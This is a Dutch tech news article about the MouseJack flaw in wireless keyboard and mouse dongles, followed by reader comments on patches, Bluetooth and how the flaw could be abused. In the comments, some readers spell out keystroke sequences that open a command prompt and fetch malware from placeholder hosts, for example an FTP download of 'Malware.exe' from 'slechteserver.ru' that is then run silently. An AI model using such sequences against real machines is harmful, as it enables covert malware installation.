Veel rf-dongels muizen en toetsenborden vatbaar voor misbruik

Het blijkt eenvoudig om rf-dongels voor draadloze toetsenborden en muizen om de tuin te leiden: een aanvaller kan ze toetsaanslagen laten accepteren en zo malware een systeem binnensmokkelen. De dongels van veel fabrikanten zijn kwetsbaar.

De aanval kan met een usb-dongel van 15 dollar worden uitgevoerd en werkt tot op een afstand van 100 meter, constateerde Bastille Networks, die de kwetsbaarheid beschrijft en hem MouseJack genoemd heeft. Dongels van invoerapparatuur van onder andere Logitech, Dell, HP, Lenovo en Microsoft zijn kwetsbaar. Bij Logitech gaat het om de Unifying Receiver in combinatie met de K360, K400r, K750 en K830. Logitech heeft een softwareupdate uitgebracht om het probleem te verhelpen.

Dat probleem schuilt in het feit dat de rf-packets van de draadloze toetsenborden weliswaar zijn versleuteld, maar die voor muiskliks en -bewegingen niet. Aangezien er geen authenticatiemethode is, kan een dongel dus geen onderscheid maken tussen de kliks van de gebruiker en die van de aanvaller. Bastille heeft nu een bug gevonden in de manier waarop de dongels de ontvangen pakketjes verwerken. Via de kwetsbaarheid is het mogelijk 'muis-packets' zo aan te passen dat ze toetsaanslagen genereren. De ontvangende dongel van een doelwit accepteert de packets en de aanvaller kan zo op deze manier code zoals malware het systeem binnenhalen en uitvoeren, om het systeem bijvoorbeeld over te nemen.

Crazyradio PADe beveiligingsonderzoekers maakten gebruik van de Crazyradio PA, een rf-dongle met een nRF24L-tranceiver en antenne voor werking op lange afstand. De firmware hiervan bleek eenvoudig aan te passen met enkele regels Python voor packetsniffing- en codeinjectie-functionaliteit. Via fuzzing konden de pakketjes van en naar dongels geanalyseerd worden.

De meeste bleken vatbaar voor muis-spoofing en dus voor injectie van toetsaanslagen, maar sommige dongels bleken ook onversleutelde keyboardpackets te accepteren. Daarnaast bleek de kortdurende pairingmode die sommige dongels bieden soms omzeild te kunnen worden, waarna een aanvaller zijn toetsenbord zonder verdere interactie van de gebruiker kan pairen.

Bij ongeveer de helft van de geteste onderdelen is updaten van de accessoires om de kwetsbaarheid te verhelpen niet mogelijk, claimt Bastille. Gebruikers wordt aangeraden die dongels niet meer te gebruiken en over te stappen op bluetooth-varianten of invoerapparatuur met draad. Het beveiligingsbedrijf heeft een lijst van onderzochte onderdelen vrijgegeven en de broncode van zijn tools op Github gepubliceerd zodat gebruikers zelf kunnen controleren welke dongels met muizen en toetsenborden nog meer kwetsbaar zijn.

Helaas!
De video die je probeert te bekijken is niet langer beschikbaar op Tweakers.net.

Door Olaf van Miltenburg

Nieuwscoördinator

Feedback • 25-02-2016 16:36
98 • submitter: MR_VIPER

25-02-2016 • 16:36

98 Linkedin

Submitter: MR_VIPER

Lees meer

Logitech komt in augustus met firmware-update voor kwetsbare Unifying Receiver Nieuws van 30 juli 2019
Logitech dicht lek in Options-software dat sites toegang tot toetsenbord gaf Nieuws van 14 december 2018
Onderzoeker steelt inloggegevens computer via usb-ethernetadapter Nieuws van 7 september 2016
Geautomatiseerde analyse ontdekt kwetsbaarheden in routerfirmware Nieuws van 29 februari 2016
Windows-gebruikers krijgen patch voor 'usb-lek' dat aanvallers misbruiken Nieuws van 12 augustus 2015
Onderzoekers demonstreren autohack via dongle van verzekeraars Nieuws van 12 augustus 2015
Onderzoekers leggen kwetsbaarheden in usb-implementaties bloot Nieuws van 16 oktober 2014
Onderzoekers kraken firmware usb-controllers Nieuws van 31 juli 2014
Beveiligingsonderzoeker waarschuwt voor misbruik nfc Nieuws van 26 juli 2012
KPN: alle laptops met internet kwetsbaar voor 'donglehack' Nieuws van 23 april 2010
Bluetooth-gadgets kwetsbaar voor afluisterpraktijken Nieuws van 11 augustus 2003
Meer producten en artikelen
Toetsenborden Muizen

Reacties (98)

-Moderatie-faq
98
93
42
1
0
33
Wijzig sortering
_Thanatos_
25 februari 2016 21:24
Één oplossing: Bluetooth.

Serieus, waarom werkt dat spul nog steeds op klassieke RF, terwijl we een degelijke standaard hebben voor draadloze peripherals?! Er mag nog steeds een dongel bij zitten, maar laat dat dan een BT-dongel zijn. Hoeven de fabrikanten niet steeds een nieuw vierkant wiel uit te vinden.
Felix3301
@_Thanatos_25 februari 2016 22:28
Sommige RF oplossingen zoals die van microsoft voor de xbox one controller kunnen een lagere latency bieden dan bluetooth. Dat vind ik een goede reden.
lonaowna
@Felix330125 februari 2016 22:48
Bluetooth 4.0 Low Energy heeft een latency van < 10 ms. Ik geloof niet dat Microsoft daar ver onder kan zitten.
(ze noemen zelf 3 ms: https://www.bluetooth.org...oadDoc.ashx?doc_id=227336)
Felix3301
@lonaowna26 februari 2016 01:08
Ik weet het niet zeker maar ik meen dat bluetooth inherent met een buffer werkt. Ik denk dat de verversingssnelheid van die buffer voor een hogere "latency" zorgt. Muizen en controllers hoeven maar weinig data te verzenden maar die data moet wel het liefst meteen gelezen worden. Als er een buffer is die dat te traag doet creeer je een soort van latency
laptopleon
@Felix330126 februari 2016 01:44
Daarnaast is de latency van het draadloos verzenden niet het enige wat vertraging geeft. Computers en hun bussen, geheugen etc zijn nu bijvoorbeeld stukken sneller dan 15, 20 jaar geleden maar een (bedraad) Wacom tablet of USB muis heeft nog steeds een zichtbare lag, vooral bij snellere bewegingen. Dit valt vaak niet zo op en is voor de meesten ook niet zo boeiend, maar bijvoorbeeld bij een Cintiq (Wacom met ingebouwd LCD-scherm) zie je je cursor en je penpunt naadt elkaar en dan valt het veel meer op.
matroosoft
@Felix330126 februari 2016 02:10
Ik heb al een tijd een Bluetooth muis en merk niets van enige vertraging. Nu speel ik geen games, maar het is wat mij betreft een prima verbinding voor de doorsnee muis. Het is gewoon vervelend met de trend van tegenwoordig van steeds minder poorten dat er een poort in gebruik genomen wordt door zo'n RF dongle.
lvanz
@matroosoft26 februari 2016 09:09
En de accuduur?
_Thanatos_
@lvanz26 februari 2016 13:18
Mijn BT laptop-muis heb ik een aantal vakanties zonder batterijen vervangen kunnen gebruiken, zeg 2 uurtjes per dag. Accuduur (batterijduur in mijn geval) is dus meer dan prima, en hoeft ook niet slechter te zijn dan met een dom RF-signaal.
Red_inc
@_Thanatos_26 februari 2016 03:51
Waarom zijn alle BT oplossing zo duur! Tevens vind ik persoonlijk BT te traag de keyboards die ik ken kunnen de keystrokes soms niet bij houden erg irritant ze komen wel maar komen soms met een pauze en dan met 7 tegelijk. Waar maakt men zich eigenlijk druk over het aantal draadloze keyboards op rf is erg beperkt. En de mensen die dit kunnen hacken nog veel beperkter. Ik lig hier dan ook snachts niet wakker van.
Unicron
25 februari 2016 16:46
Netjes van Logitech om snel een firmware update uit te brengen. Ik heb deze zojuist geinstalleerd, wat makkelijk en snel ging.
maxxie85
@Unicron25 februari 2016 16:53
ik ook, voor de logitech mensen onderons

http://forums.logitech.co...rch-Findings/td-p/1493878
-MB-
@maxxie8525 februari 2016 17:37
Die linkt praat over firmware versie nummers die in beide gevallen niet overeen komen met de k360 toetsenbord hier in gebruik, dus kan niets updaten hier.
dezero
@-MB-25 februari 2016 18:05
To check the firmware version on your Unifying receiver, go to Unifying Software → Advanced, and then select the Unifying Receiver.
Standaard staat waarschijnlijk je toetsenbord geselecteerd. De instructies heel nauwkeurig volgen en alles zou goed moeten gaan.
The Zep Man
@-MB-25 februari 2016 18:07
Die linkt praat over firmware versie nummers die in beide gevallen niet overeen komen met de k360 toetsenbord hier in gebruik,
Het gaat niet om het toetsenbord, maar om de firmware van de receiver. Zie de top van de device tree ('Unifying Receiver').

[Reactie gewijzigd door The Zep Man op 25 februari 2016 18:07]

maxxie85
@-MB-25 februari 2016 18:15
Zoals The Zep Man al aangeeft gaat het inderdaad om de firmware van de unifying receiver en niet om de firmware van de k360 toestenbord. Ikzelf zat eerst ook niet goed te kijken en keek naar de firmware van mijn MX Anywhere 2.

edit. typfoutje

[Reactie gewijzigd door maxxie85 op 25 februari 2016 18:17]

Anoniem: 426269
@maxxie8525 februari 2016 17:33
Ha, dank u! Ik zat al de hele dag te wachten op dit bericht, want ik had het vanmorgen al op nu.nl gelezen.

Via de Logitech site de laatste software gedownload, maar die was uit 2010 en de 'Update Firmware' button was greyed out. En firmware updates kon ik niet vinden op de Logitech site. Maa nu dus wel. En je moet de firmware dus eerst runnen. Nu dus gelukt. :)
iTeV
@Unicron25 februari 2016 16:48
Hopelijk brengen de andere fabrikanten ook een software update uit.
j4cc-o
@Unicron25 februari 2016 16:48
dit was al in 2011 bekend.Niet echt netjes van logitech om nu pas met een update te komen
Anoniem: 16328
@Unicron25 februari 2016 16:53
Ik heb een Trust :') en je weet wat ze daarvan zeggen :P.
bogy
@Anoniem: 1632826 februari 2016 08:41
don't trust a trust ...
Draconian Devil
@Anoniem: 1632826 februari 2016 11:50
Ja, welTRUSTen.....
mcDavid
@Unicron25 februari 2016 18:09
Ik vind het niet zo netjes dat deze firmware update alleen via een windows-systeem geïnstalleerd kan worden. Moet ik daar eerst weer aan zien te komen... Gelukkig heeft mijn vriendin zo'n ding, inclusief kwetsbare microsoft dongle. Hoog tijd dat ik mijn NRF24 dongles eens ga testen dus, voordat ik update. :).
loki504
@mcDavid25 februari 2016 18:50
Dual boot. Windows 10 en activeer hem niet. Tuurlijk jammer dat het niet gewoon onder linux gaat. Maar hij is nog steeds beter als niets
miel54
@loki50425 februari 2016 23:02
Moest windows nu eens een optie hebben om te dualbooten dan zou dat een goede oplossing zijn.

Anderzijds zou het niet mogelijk zijn om de usb dongle te koppelen aan een virtuele windows?
loki504
@miel5425 februari 2016 23:05
? je kan windows toch prima naast Linux draaien?
https://www.youtube.com/watch?v=vxepmtjmilQ

Zou denk ik ook wel moeten lukken.
miel54
@loki50425 februari 2016 23:28
Ik draai momenteel gentoo. Probeer eens windows te installeren naast gentoo zonder de bootloader te breken. Dit soort dingen horen gewoon beschikbaar te zijn voor windows, mac en linux. logitech zegt trouwens wel compatibel te zijn met linux op te verpakking.
bogy
@miel5426 februari 2016 08:44
mjah, ik draai ubuntu (mate) naast windows ...
geen probleem hier hoor ... allebei booten ze met EFI en de bootloader (grub) handelt dat allemaal perfect af (zelf ook efi uiteraard)

het is dus uiteraard wel zaak dat je eerst windows installeert en daarna je linux; tenzij je weet hoe je de bootloader achteraf terug kan zetten naar grub; dit heb ik gedaan na upgrade naar win10; gewoon met een usb stick de bootloader terug zetten...
de windows bootloader ondersteunt enkel windows, dus die moet je sowieso niet gebruiken bij multiboot
miel54
@bogy26 februari 2016 10:55
Daar zit hen het probleem ik draai helemaal geen windows. Eventjes heel de bootloader breken voor een OS dat je niet gebruikt is wat teveel van het goede. Bootloader terugzetten is opzich het probleem niet (gentoo heeft daar een mooie handbook voor). Maar om nu een heel nieuw os te installeren, bootloader repareren en dan achteraf alles weer wegdoen. Dat is gewoon teveel werk en zeker omdat logitech adverteert met linux compabiliteit.
bogy
@miel5426 februari 2016 14:21
je zal toch wel iemand kennen dan die je effe wil helpen met z'n windows machine?

en wat dacht je anders van effe de demo te installeren van win10 in een VM?
vSchooten
@miel5426 februari 2016 08:46
Dat is erg logisch omdat windows 10 hun eigen bootloader op de bootsection zetten van de schijf, over grub.
ik draai xubuntu naast windows 10, die kan je instellen dat ie de optie van linux laat zien bij het booten. dat werkt ook gewoon :P
bogy
@vSchooten26 februari 2016 14:19
laat windows xubuntu (en dus potentieel ook andere debian/ubuntu distro's) zien in zijn bootloader?
vSchooten
@bogy26 februari 2016 14:35
je moet zelf de entry aanmaken maar je kan gewoon in de windows bootloader linux laten booten.
bogy
@vSchooten26 februari 2016 15:35
dat wist ik dus niet...ik ging er altidj van uit dat dit niet zou werken omdat het vroeger ook nooit werkte, ik dacht dan ook altijd dat het filesysteem hier voor iets tussen zou zitten (windows leest geen ext-filesystemen uit dus de .EFI file kan hij niet zien) maar blijkbaar zit de vork toch anders in de steel...
vSchooten
@bogy26 februari 2016 15:55
nou ja, grub zelf zit altijd in een fat systeem. dus dat kan het zijn :P
rbr320
@Unicron25 februari 2016 17:09
Ik heb deze zojuist geinstalleerd, wat makkelijk en snel ging.
Dat is mooi om te horen. Hoe doe ik dit onder Linux?
dezero
@rbr32025 februari 2016 18:01
Ik heb Windows geboot, de firmware bijgewerkt en daarna weer terug gegaan naar Linux Mint, muis werkt nog prima. Als je zelf geen Windows installatie meer hebt, dan kan je vast de computer van iemand anders gebruiken. Misschien werkt het ook met Wine, maar voor de zekerheid heb ik het maar in Windows gedaan.
rbr320
@dezero25 februari 2016 18:42
In Wine die unifying software van Logitech installeren en werkend krijgen lijkt me wat veel moeite. Ik gok dat ik de receiver maar ergens in een Windows pc moet pluggen. Overigens heb ik 3 van die dingen, dus ik ben even bezig gok ik.
Heedless
25 februari 2016 16:45
Ik heb zo'n Microsoft Sculpt muis. Zouden fabrikanten verplicht kunnen worden zo'n muis terug te nemen als ze zelf niet te updaten zijn?
seapip
@Heedless25 februari 2016 17:13
Mijn sculpt muis van microsoft heeft bluetooth welke volgens dit bericht niet vatbaar is.
Soldaatje
@Heedless25 februari 2016 17:22
De Sculpt muis ergonomic heeft 3 jaar beperkte fabrieksgarantie:
http://download.microsoft...5C/Limited%20Warranty.pdf (pag. 12)
Hier staat in dat schade door verlies van data of privacy in ieder geval niet vergoed wordt.
Of de bug zelf onder de garantie valt is dus nog maar zeer de vraag.
Op eventuele defecten die worden ontdekt
na het verstrijken van de Garantieperiode is geen enkele garantie of voorwaarde van toepassing.
Dus je kan het proberen, en als genoeg mensen klagen zullen ze wel met een update komen.
M.l.
@Heedless25 februari 2016 19:37
In principe vind ik wel dat fabrikanten hun producten zodanig moeten ontwerpen dat eventuele veiligheidsproblemen opgelost kunnen worden; bijvoorbeeld de stagefrightbug die op ietwat verouderde telefoons niet word verholpen vind ik oneerlijk.

In dit geval is het vaak niet praktisch om een aanval te doen en je kunt het ook op tijd doorhebben en de dongle loskopopelen. Sommige toetsenborden zijn misschien af te luisteren, maar ook daar vraag ik me af of het wel de schuld van de fabrikant is. Sowieso vind ik het niet slim om gevoelige info zomaar draadloos te versturen.

Je mag natuurlijk wel verwachten dat een fabrikant zijn best doet om de apparatuur te beveiligen, maar je moet ook wel bedenken dat een toetsenbord of muis niet is up te daten. Toetsenborden en muizen zijn relatief goedkoop dus voor die prijs hoef je vaak ook niet te verwachten dat de fabrikant garandeerd dat ze onkraakbare encryptie toepassen.
Heedless
@M.l.26 februari 2016 23:16
Ik snap wat je bedoeld, het gaat hier 'maar' om een muis en keyboard. Maar het probleem is dat ze op sommige onderdelen geen encryptie toepassen. Mijn Microsoft muis en keyboard waren niet goedkoop, dan hoop ik toch een beetje dat de communicatie fatsoenlijk in elkaar steekt. Juist omdat je bij de standaard Windows en OSX installatie precies weet welke keystrokes je nodig hebt om mogelijk schadelijke commando's uit te voeren. Je weet dat je er op kon wachten tot iemand de communicatie ging sniffen.
M.l.
@Heedless27 februari 2016 09:59
Je weet dat je er op kon wachten tot iemand de communicatie ging sniffen.
Precies, en daarom zit ik bekabeld.
Heedless
@M.l.27 februari 2016 10:55
Haha, touche.
Kent iemand een bekabeld alternatief voor de Microsoft sculpt keyboard en muis?
Anoniem: 686964
@Heedless26 februari 2016 15:36
Als een boef jouw muis afluistert dan ziet hij alleen dat je naar links, rechts boven onder muist en af en toe scrolt.
Heedless
@Anoniem: 68696426 februari 2016 23:09
Heb je het artikel wel gelezen?
Via de kwetsbaarheid is het mogelijk 'muis-packets' zo aan te passen dat ze toetsaanslagen genereren
j4cc-o
25 februari 2016 16:39
This research was done in 2011 by travis goodspeed : http://travisgoodspeed.bl...ty-is-nrf24l01s-duty.html
MAX3400
@j4cc-o25 februari 2016 17:19
Dat staat toch in het gelinkte artikel gewoon genoemd in de voetnoten? Oftewel, ere wie ere toekomt; ik begrijp niet precies waarom het apart in deze comments moet?
DrSnuggles
@MAX340025 februari 2016 17:48
Toch vreemd dat Logitech (en de andere tech companies) niet eerder actie hebben ondernomen, als het blijkbaar al zolang bekend is.
j4cc-o
@MAX340026 februari 2016 09:00
dat is om aan te geven dat het niet nieuwswaardig is. Of komt er morgen een artikel dat iemand Windows XP gehackt heeft?
bArAbAtsbB
25 februari 2016 16:50
waarom ze niet gewoon naar pairing gaan is mij al jaren onduidelijk....
Anoniem: 135018
25 februari 2016 16:55
Thuis heb ik lekker alles met draad. Enig de raspberry pi(open elec) werkt met wireless keyboard van rapoo.


Zou je met zo'n dongel een universele reciver kunnen programeren? Lekker luisteren naar keystrokes van de buren.
WhiteDog
@Anoniem: 13501826 februari 2016 00:12
Je hebt dan niet alles met draad :P

En nee, het gaat hier vooralsnog om de ontvanger om de tuin te leiden zodat hij een muis-actie als een toetsaanslag ziet. Al zal het onderscheppen van keystrokes op zich ook wel niet zo geweldig moeilijk zijn... toch?
erikieperikie
25 februari 2016 17:52
Is er eigenlijk een verschil tussen de K400 en de K400r? Ik wist namelijk niet van het bestaan van een -r versie. Voor de zekerheid toch maar de update gedaan, binnen 5 minuten gelukt en daarna netjes de Unifying software verwijderd.
batjes
25 februari 2016 18:29
Draadloze keyboards/muizen zijn te hacken? Dat is de afgelopen 10 jaar niet veranderd dus.
Technoturk
25 februari 2016 18:39
screen recorder instaleren :P kan je trug kijken of/hoe je gehackt bent. of je dan al telaat bent moet je maar bekijken wat je doet
RL600
25 februari 2016 17:25
Ik moet eerlijk zeggen dat ik me afvraag wat het nut van deze hack is (los van het feit dat dit oud nieuws is).

Ok, stel dat een hacker naast me zit (want ja mijn Logitech dongle heeft geen bereik verder dan pak hem beet 3 meter). Dan verstuurt hij zo'n pakketje en dan wat.... Ok, ik heb wat irritatie, maar ik kan zonder moeite de fout van zijn ene klik terugzetten. HIj heeft geen controle over de PC heeft geen keylogger of wat dan ook. Hij moet dan wel naar het beeld kijken en dan heel snel doorklikken om wat te zien. Ten eerste valt dat op en ten tweede bij het invullen van bijvoorbeeld een wachtwoord zie je toch alleen maar bolletjes.

Nou is er natuurlijk nog een methode. Net zo als de chip in het artikel kan hij extra ver. Heel mooi, maar dan valt er toch niks te zien en kan alleen een klik worden gemaakt op afstand. Nogmaals, geen controle geen keylogger of ook maar iets wat schade kan aanrichten.

Het enige waarvoor dit leuk is voor een les bij informatica of zoiets. Laten zien wat er kan een beetje de kinderen uitleggen zodat ze wat feeling krijgen. Diezelfde leerling neemt dat mee en voert dat met veel lol uit bij de eerst volgende digibeet van en leraar.

Het zou op zich wel netjes zijn als bedrijven er een update voor geven. Nog niet zo zeer dat het nodig is, maar meer of wat irritatie te voorkomen.
Xirt
@RL60025 februari 2016 18:03
Via toetsencommandos kan je het startmenu openen, naar "Run" gaan en alles uitvoeren wat je maar wilt. Je zou bijvoorbeeld "regedit" kunnen openen om het systeem eens grondig onder handen te nemen (of om meer openingen te creëren). Dat jouw dongle een bereik heeft van 3 meter maakt daarbij niet uit: als het commando verzonden wordt vanaf 100m zou dat alsnog opgepakt kunnen worden door de dongle (alleen ontvangen, ik neem aan dat niet elke toetsaanslag bevestigd wordt).
RL600
@Xirt25 februari 2016 18:09
Ok, je tweede punt staat letterlijk beschreven in mijn stukje. Dus dat kan je weglaten.

De grote grap is dat je geen bevestiging krijgt van (!!) het OS. Dus je kan bevestiging krijgen van de toets is aangekomen, maar niet van het OS zelf. De PC kan in lock staan, misschien vraagt hij om een wachtwoord bij het uitvoeren van "CMD" of "Run". Misschien hebben we het helemaal niet over een Windows PC. Dit kan je alleen bevestigingen als je ernaast zit over er ook nog een CCTV hebt bestaan (tegen die tijd, gebruikt een hacker wel een keylogger ofzo).

Maar goed het is nog steeds leuk om je collega te irriteren of zoiets :)
FreshMaker
@RL60025 februari 2016 18:27
[ctrl] + [alt] met [cursor down] werkt dan beter hoor. ....
freaq
@RL60025 februari 2016 19:27
het hoeft ook niet altijd te werken...
als het op zeg 1 van de 500 pc's op het netwerk lukt dan heb je al success,
elk systeem is zo sterk als de zwakste schakel, en gewoon lompweg 500X een commando uitsturen kost niets, en op een gegeven moment is er vast iemand weg van zijn bureau maar nog niet uitgelogd, en kassa je hebt een beveiligde VPN naar zijn pc of zoiets.

verder wat ook interesasnt is is als je een PC geinfecteerd hebt, om deze pc dan weer commandos te laten versturen via deze modules naar andere pc's en daarmee elke beveiliging te omzeilen, en dus wel steeds verder te verspreiden

[Reactie gewijzigd door freaq op 25 februari 2016 19:28]

Anoniem: 463321
@RL60025 februari 2016 17:38
De hacker kan simpelweg een lading toetsenbord commando's afvuren en daarmee al genoeg doen. Beeld is niet nodig.
RL600
@Anoniem: 46332125 februari 2016 18:04
En dan wat? Mijn presentatie van morgen afschrijven? Lorem ipsum sturen? Wow, goede hack hoor zeer effectief en destructief!
analog_
@RL60025 februari 2016 18:13
win+r, iexplore http://someexe, run it. Beetje creatiever nadenken voortaan. Bleh, een comment lager lezen :+

[Reactie gewijzigd door analog_ op 25 februari 2016 18:15]

verstrooid_prof
@RL60025 februari 2016 18:14
Ctrl-alt-del
of: beter nog:
windows+R (run)
CMD [enter]
FTP ftp.slechteserver.ru
user: anonymous
email@dress
GET Malware.exe
quit
start malware.exe /silentinstall /force /boot=yes
genoeg?
RL600
@verstrooid_prof25 februari 2016 18:24
Aanname 1: het is een windows PC
Aanname 2: De PC is ingelogd
Aanname 3: Alle commanda's zijn goed aangekomen in die volgorde
Aanname 4: Nergens wordt er om een wachtwoord van de windows PC gevraagd wat het hele proces te niet doet
Aanname 5: Er is geen Antivirus geinstalleerd
Aanname 6: Gebruiker is achterlijk en als hij achter zijn PC zit laat het toe dat zonder enige rede een CMD wordt geopend en iets van een FTP gaat laden.

Genoeg?
loki504
@RL60025 februari 2016 19:04
Het is een hack wat niets kosten en maar wel iets kan opleveren. Dus ben jij niet vatbaar dan bestaat de kans dat ze je. Buurman pakken. En 90% van de mensen wil geen meldingen ontvangen over installeer x/y. En al helemaal geen wachtwoord invoeren.
verstrooid_prof
@RL60025 februari 2016 19:54
Aanname 1: laatste keer dat ik keek was op linux mint de win-key+r bijna equivalent met de windows versie ervan... mogelijks ondertussen nietmeer?.
een exe EN een .Sh downloaden is peanuts, en een van beiden zal allicht werken.
Aanname 2: correct. een situatie waarin 90% van de pc's die aanstaan zich bevinden.
Aanname 3: commando's die je sequentieel ingeeft (letter per letter) komen meestal ook sequentieel aan. indien niet heeft de echte gebruiker zijn apparatuur allang door het ram gekieperd
Aanname 4: correct. zie ook aanname 2 (spotify staat open of zo)
Aanname 5: niet alle pc's hebben een werkende virusscanner. ik wil niet weten hoeveel mensen hun pc kopen met bijvoorbeeld 3 maanden norton, en dat abo niet verlengen. Trouwens: lang niet alle malware is dusdanig herkend door virussen
Aanname 6: gebruikers zitten niet steeds aan hun pc: spotify, even naar toilet, etc... En zelfs als ze eraan zitten: als ze enkel aan het lezen zijn kan het scherm wel even voor hun heen flitsen, maar is het weg voor ze het goed en wel beseffen...
Je bent aanname 7 vergeten: user werkt met een admin-account, doch .. moet k die echt ontkrachten?

Besef even hoe lomp een gemiddelde gebruiker is, en besef dan dat statistisch de helft van de medemensen nog dommer zijn...
FireDrunk
@RL60025 februari 2016 18:13
Wat dacht je van, een command prompt starten en een virus inladen via een http request? UAC helpt je ook niet. Want je kan het toetsenbord nu eenmaal bedienen...
AHBdV
@FireDrunk26 februari 2016 16:48
Je hebt er niks aan het toetsenbord te kunnen bedienen als je het admin password niet kent. UAC helpt dan dus wel degelijk!
FireDrunk
@AHBdV26 februari 2016 17:29
Correct, maar ik ken maar heel weinig mensen die een los account hebben zonder admin rechten. Doorgaans is UAC dus alleen maar een Ja/Nee (Yes/No) prompt.

Maar in principe heb je gelijk.
Finraziel
@RL60025 februari 2016 22:42
[winkey-r]iexplore www.yourmalwarehere.com
Zo makkelijk is het om iemand bijvoorbeeld naar een website te sturen waar de PC dan verder geïnfecteerd wordt. Bovendien heeft die dongle standaard dan misschien niet zo'n groot bereik (hoewel 3 meter naar mijn idee nogal laag geschat is, de mijne komt een stuk verder), maar als je aan de andere kant een veel betere antenne plaatst dan kom je een heel eind. Volgens mij doet mijn keyboard het nog wel van buiten voor het raam, met een wat betere antenne lukt het denk ik ook nog wel vanuit een auto of vanaf de buren.
ATS
@RL60026 februari 2016 08:15
Als ik remote kan typen en muizen op jouw machine, denk je dan niet dat ik daar prima een keylogger of wat voor andere rommel ik maar wil kan installeren? Remote access open zetten?
1 2 3

Op dit item kan niet meer gereageerd worden.

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

    Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

    janee